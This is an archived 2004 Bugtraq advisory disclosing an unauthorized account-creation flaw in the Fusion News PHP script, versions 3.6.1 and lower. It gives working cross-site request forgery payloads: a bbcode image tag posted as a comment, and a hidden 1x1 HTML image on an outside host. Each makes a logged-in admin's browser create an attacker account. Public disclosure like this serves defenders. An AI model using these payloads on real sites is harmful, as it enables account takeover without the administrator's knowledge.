Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Fusion News Yet Another Unauthorized Account Addition Vulnerability

From: Joseph Moniz <r3d_5pik3 () yahoo com>
Date: 29 Jul 2004 22:52:24 -0000


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Product:  Fusion News
vendor: FusionPHP (fusionphp.net)
Affected Versions:  3.6.1 and lower
Description:  A widely used news management system
Vulnerabilities:  Unauthorized Account Addition Vulnerability
Date:  July 29, 2004
Vuln Finder: r3d5pik3 (me)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
1.) About
2.) Unauthorized Account Addition
3.) Vendor Notice
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ About ] oOoOoOo(O_o)

Ok this is basicly all due to the vendor being really lazy and not SUFFEICENTLY patching the previous similar exploit. 
Basicly all the vendor did to stop the last vulnrability was make it so you had to be signd on as an admin to creat an 
account, and that is simply just not enough.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Unauthorized Account Addition ] oOoOoOo(O_o)

Unlike the previous related vulnrability this one you cant simply type something into the url bar and press enter. All 
you have to do is make sure the admin is logged on then do one of the following. (the first is probably the most 
reliable for an attacker)
1.)Leave them a comment with an [img] bbcode set like this

[img]http://vulnrable.com/news/index.php?id=signup&username=r3d5pik3&email=r3d_5pik3 () yahoo 
com&password=password&icon=&le=3&timeoffset=1[/img]

2.)As long as the admin has RECENTLY logged on you could exploit it remotely. By convincing him to go to a site that 
has a malicious <img> tag such as the following

<img src="http://free.hostultra.com/~negativebliss/phpfusion/index.php?id=signup&username=teh-r3d-1&email=r3d_5pik3 () 
yahoo com&password=password&icon=&le=3&timeoffset=1" size="1" width="1">

That would make a 1x1 pixel image meaning the admin wouldnt even know what happend.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
(o_O)oOoOoOo [ Vendor Notification ] oOoOoOo(O_o)

Give me 5 seconds to press the send button to the vendor ;)

-r3d5pik3
(o_O)oOoOoOo [ ph33r t3h r3d 1z !!! ] oOoOoOo(O_o)
Previous By Date Next
Previous By Thread Next

Current thread: